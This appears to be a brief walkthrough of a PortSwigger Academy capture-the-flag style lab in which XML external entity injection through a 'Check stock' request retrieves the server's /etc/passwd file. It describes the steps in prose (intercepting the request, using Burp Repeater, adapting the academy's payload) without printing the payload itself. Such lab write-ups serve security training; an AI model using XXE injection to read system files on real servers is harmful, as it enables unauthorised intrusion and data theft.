This lab has a “Check stock” feature that parses XML input and returns any unexpected values in the response.
To solve the lab, inject an XML external entity to retrieve the contents of the `/etc/passwd` file.
First, let’s collect some information on the webapp. Let’s click around the store and look at the requests we are getting. When we click on the stock check option of the product, we get some information to work with.
Let’s send it to the repeater and craft our payload. Portswigger Academy provides the exact payload in its vulnerability description, all we need to do is to modify our response correctly and send it.
Once it is done we will get a bad request, but it will be followed by the information we are looking for.
The lab is solved.